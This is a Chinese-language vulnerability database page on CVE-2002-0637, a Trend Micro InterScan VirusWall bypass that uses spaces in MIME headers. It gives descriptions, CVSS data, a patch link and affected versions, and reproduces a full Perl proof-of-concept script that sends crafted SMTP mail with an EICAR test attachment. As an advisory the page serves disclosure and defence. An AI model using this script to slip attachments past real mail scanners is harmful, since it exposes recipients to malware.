CVE-2002-0637
CVSS7.5
发布时间 :2002-07-11 00:00:00
修订时间 :2008-09-05 16:28:32
NMCOES    

[原文]InterScan VirusWall 3.52 build 1462 allows remote attackers to bypass virus protection via e-mail messages with headers that violate RFC specifications by having (or missing) space characters in unexpected places (aka "space gap"), such as (1) Content-Type :", (2) "Content-Transfer-Encoding :", (3) no space before a boundary declaration, or (4) "boundary= ", which is processed by Outlook Express.


[CNNVD]Trend Micro InterScan VirusWall空格间隔扫描绕过漏洞(CNNVD-200207-062)

        
        TrendMicro's VirusWall是一款企业级的防病毒软件。
        TrendMicro's VirusWall对含有特殊邮件头信息的邮件缺少正确的处理,远程攻击者可以利用这个漏洞绕过防病毒的扫描。
        当TrendMicro's VirusWall处理非标准邮件头构成的邮件时存在问题,如果邮件头的一些字段包含额外的空格间隔,TrendMicro's VirusWall就会忽略这个邮件而不去扫描,这些邮件头字段包括:
        "Content-Type :","Content-Transfer-Encoding :",' boundary="----=_NextPart_000_000E_01C2100B.F369D840 "'和' boundary="----= _NextPart_000_000E_01C2100B.F369D840"'
        而一般流行的EMAIL客户端如Outlook,就会忽略其中的空格,在正确的显示邮件内容,如:
        1)使用"Content-Type:"代替"Content-Type :"。
        2)使用"Content-Transfer-Encoding:"代替"Content-Transfer-Encoding :"。
        3)使用' boundary="----=_NextPart_000_000E_01C2100B.F369D840"'代替' boundary="----=_NextPart_000_000E_01C2100B.F369D840 "'。
        4)使用' boundary="----=_NextPart_000_000E_01C2100B.F369D840"'代替' boundary="----= _NextPart_000_000E_01C2100B.F369D840"'。
        这样攻击者可以使用上面描述的邮件头,并夹带包含恶意代码的附件,从而饶过防病毒软件检查,而被Outlook等邮件客户端执行。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0637
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0637
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-062
(官方数据源) CNNVD

- 其它链接及资源

http://www.securiteam.com/securitynews/5KP000A7QE.html
(VENDOR_ADVISORY)  MISC  http://www.securiteam.com/securitynews/5KP000A7QE.html
http://www.iss.net/security_center/static/9464.php
(UNKNOWN)  XF  interscan-viruswall-protection-bypass(9464)

- 漏洞信息

Trend Micro InterScan VirusWall空格间隔扫描绕过漏洞
高危 其他
2002-07-11 00:00:00 2005-10-20 00:00:00
远程  
        
        TrendMicro's VirusWall是一款企业级的防病毒软件。
        TrendMicro's VirusWall对含有特殊邮件头信息的邮件缺少正确的处理,远程攻击者可以利用这个漏洞绕过防病毒的扫描。
        当TrendMicro's VirusWall处理非标准邮件头构成的邮件时存在问题,如果邮件头的一些字段包含额外的空格间隔,TrendMicro's VirusWall就会忽略这个邮件而不去扫描,这些邮件头字段包括:
        "Content-Type :","Content-Transfer-Encoding :",' boundary="----=_NextPart_000_000E_01C2100B.F369D840 "'和' boundary="----= _NextPart_000_000E_01C2100B.F369D840"'
        而一般流行的EMAIL客户端如Outlook,就会忽略其中的空格,在正确的显示邮件内容,如:
        1)使用"Content-Type:"代替"Content-Type :"。
        2)使用"Content-Transfer-Encoding:"代替"Content-Transfer-Encoding :"。
        3)使用' boundary="----=_NextPart_000_000E_01C2100B.F369D840"'代替' boundary="----=_NextPart_000_000E_01C2100B.F369D840 "'。
        4)使用' boundary="----=_NextPart_000_000E_01C2100B.F369D840"'代替' boundary="----= _NextPart_000_000E_01C2100B.F369D840"'。
        这样攻击者可以使用上面描述的邮件头,并夹带包含恶意代码的附件,从而饶过防病毒软件检查,而被Outlook等邮件客户端执行。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时没有合适的临时解决方法。
        厂商补丁:
        Trend Micro
        -----------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Trend Micro InterScan VirusWall for Windows NT 3.52:
        Trend Micro Patch Hotfix_build1466.zip
        ftp://ftp-download.trendmicro.com.ph/Gateway/isnt/Hotfix_build1466.zip

- 漏洞信息 (21625)

Trend Micro InterScan VirusWall for Windows NT 3.52 Space Gap Scan Bypass (EDBID:21625)
windows remote
2002-07-18 Verified
0 SecuriTeam
N/A [点击下载]
source: http://www.securityfocus.com/bid/5259/info

A vulnerability has been reported in certain VirusWall versions. Reportedly, it is possible to bypass the scanning mechanism of VirusWall by adding extraneous spaces in certain email HTTP header fields.

A malicious email server may add extraneous whitespace in certain email headers. This would cause VirusWall to ignore the malicious email and not scan it. However, many popular email client programs, including Outlook, will ignore this header and display the content regardless. This may allow malicious content to bypass VirusWall and still be interpreted by a client system. 

#!/usr/bin/perl

# The following code generates a malformed email with an EICAR attachment(False Virus).
# The vulnerability has been found to be present in TrendMicro's VirusWall, and has been now patched.
# Refer to http://solutionbank.antivirus.com/solutions/solutionsearch.asp solution ID 11948
#
# BeyondSecurity's SecurITeam, Copyrighted Material, for Testing Purposes only. For more information see:
# http://www.securiteam.com/securitynews/5KP000A7QE.html

use Getopt::Std;
use IO::Socket::INET;

getopt('tfhvsb');

if (!$opt_f || !$opt_t || !$opt_h)
{
  print "Usage: malformed_email.pl <-t to> <-f from> <-h smtphost> [-v
variant] [-s subject] [-b text]\nVariants:\n(1) Content-Type\n(2) Content
Transfer Encoding\n(3) Boundary Space (trailing)\n(4) Boundary Space
(prefix)\n";
  exit;
}
$sock = IO::Socket::INET->new(PeerAddr => "$opt_h",PeerPort => '25', Proto
=> 'tcp');
unless (<$sock> =~ "220") { die "Not a SMTP Server?" }
print $sock "HELO you\r\n";
unless (<$sock> =~ "250") { die "HELO failed" }
print $sock "MAIL FROM:<$opt_f>\r\n";
unless (<$sock> =~ "250") { die "MAIL FROM failed" }
print $sock "RCPT TO:<$opt_t>\r\n";
unless (<$sock> =~ "250") { die "RCPT TO failed" }
print $sock "DATA\r\n";
unless (<$sock> =~ "354") { die "DATA failed" }

if ($opt_v eq "1")
{
 $content_type = "Content-Type :";
}
else
{
 $content_type = "Content-Type:";
}

if ($opt_v eq "2")
{
 $content_transfer_encoding = "Content-Transfer-Encoding :";
}
else
{
 $content_transfer_encoding = "Content-Transfer-Encoding:";
}

if ($opt_v eq "3")
{
 $boundary = "boundary=----=_NextPart_000_000E_01C2100B.F369D840 ";
}
else
{
 if ($opt_v eq "4")
 {
  $boundary = "boundary= ----=_NextPart_000_000E_01C2100B.F369D840";
 }
 else
 {
  $boundary = "boundary=\"----=_NextPart_000_000E_01C2100B.F369D840\"";
 }
}

print $sock <<EOF;
From: $opt_f
To: $opt_t
Subject: $opt_s
MIME-Version: 1.0
$content_type multipart/mixed;
  $boundary
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300

This is a multi-part message in MIME format.

------=_NextPart_000_000E_01C2100B.F369D840
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

$opt_b

------=_NextPart_000_000E_01C2100B.F369D840
$content_type application/x-zip-compressed;
  name="eicar_com.zip"
$content_transfer_encoding base64
Content-Disposition: attachment;
  filename="eicar_com.zip"

UEsDBAoAAAAAAOCYuCg8z1FoRAAAAEQAAAAJAAAAZWljYXIuY29tWDVPIVAlQEFQWzRcUFpYNTQo
UF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCpQSwECFAAK
AAAAAADgmLgoPM9RaEQAAABEAAAACQAAAAAAAAABACAA/4EAAAAAZWljYXIuY29tUEsFBgAAAAAB
AAEANwAAAGsAAAAAAA==
------=_NextPart_000_000E_01C2100B.F369D840--
\n.\n
EOF

print "Finished sending data\n";
print "Variant #$opt_v\n";

$a = <$sock>;
print "$a\n";

close($sock);		

- 漏洞信息

6166
Trend Micro InterScan VirusWall Non-RFC Compliant Email Scan Bypass
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-07-02 Unknow
2002-07-02 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Trend Micro InterScan VirusWall Space Gap Scan Bypass Vulnerability
Failure to Handle Exceptional Conditions 5259
Yes No
2002-07-18 12:00:00 2009-07-11 02:56:00
Discovery credited to "Noam Rathaus" <noamr@beyondsecurity.com>.

- 受影响的程序版本

Trend Micro InterScan VirusWall for Windows NT 3.52
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 alpha
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
Trend Micro InterScan VirusWall for Windows NT 5.1
Trend Micro InterScan VirusWall for Windows NT 3.52 build 1466

- 不受影响的程序版本

Trend Micro InterScan VirusWall for Windows NT 5.1
Trend Micro InterScan VirusWall for Windows NT 3.52 build 1466

- 漏洞讨论

A vulnerability has been reported in certain VirusWall versions. Reportedly, it is possible to bypass the scanning mechanism of VirusWall by adding extraneous spaces in certain email HTTP header fields.

A malicious email server may add extraneous whitespace in certain email headers. This would cause VirusWall to ignore the malicious email and not scan it. However, many popular email client programs, including Outlook, will ignore this header and display the content regardless. This may allow malicious content to bypass VirusWall and still be interpreted by a client system.

- 漏洞利用

The following exploit has been provided by "Noam Rathaus" &lt;noamr@beyondsecurity.com&gt;:

- 解决方案

The vendor has released a patch to address this vulnerability:


Trend Micro InterScan VirusWall for Windows NT 3.52

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站